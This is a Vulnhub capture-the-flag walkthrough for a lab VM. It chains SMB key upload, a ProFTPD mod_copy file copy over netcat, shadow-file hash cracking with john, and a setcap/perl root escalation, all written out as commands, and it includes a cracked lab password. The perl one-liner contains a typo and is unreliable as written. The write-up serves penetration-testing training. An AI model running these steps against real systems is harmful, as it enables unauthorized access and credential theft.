My Web Server: 1 Walkthrough Vulnhub | My Web Server: 1 Vulnhub Writeup
In this Articles we are solving another Vulnhub CTF My Web Server: 1 is created by Akanksha Sachin Verma you can download here this VM
Description
This boot to root VM is designed for testing your pen-testing skills and concepts. It consists of some well-known things but it encourages you to use the functionalities rather than vulnerabilities of the target
Network Scanning
First we Scanning our local network using netdiscover arp scan
netdiscover

Let’s proceed further with Nmap to scan our target IP to find open ports and running services.
nmap -sV 192.168.43.185

Nmap out is shown our target many ports are open different running services We saw FTP’s anonymous login enabled and port 445 was also available for SMB
Enumeration
We also explore the target IP in the web browser and we see a simple Apache HTTP page
http://192.168.43.185

SMB Enumeration
we move on next step and enumeration the samba server using smbmap and we see a disk drive smbdata is read-write permission
smbmap -H 192.168.43.185

we successfully login with anonymous user and we already see the disk permissions I upload my local mahchine id_rsa.pub key as a authorized_key target smbdata disk
smbclient //192.168.43.185/smbdata
put /root/.ssh/id_rsa.pub authorized_keys

We already see nmap output target our target port 2121 is open running proftpd 1.3.5 service I found the mod_copy exploit
so I connect with port 2121 using the netcat and I move the authorized_key smbdata to /home/smbuser/.ssh directory
nc -vv 192.168.43.185 2121
cpfr /smbdata/authorized_keys
cpto /home/smbuser/.ssh/authorized_keys

and I login with smbuser without any password
ssh [email protected]
id

After enumeration the system i found system shadow file the file contain all user password hashes
cd /var/www/html/.ssh/
ls
cat shadow

I copy the all user hash and save a text our local machine and using the john hash cracking tool I found a password user bla
cat >hash.txt
$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Change user smbuser to bla
- username: bla
- password itiseasy
Now we have a password bla user i run the simple switch user command
su bla
id
I run the sudo -l command and we see our current user the command with sudo permission setcap and capsh
sudo -l

setcap Privilege Escalation
using the setcap command I set the SUID or sudo permission on perl and exploit perl program to escalate the root privilege
sudo setcap cap_setuid+ep /usr/bin/perl
perl -e 'use POSIS (setuid); POSIX::setuid(0); exec "/bin/bash";'
and we found our final flag target root directory proof.txt
id
cd /root/ && ls
cat proof.txt

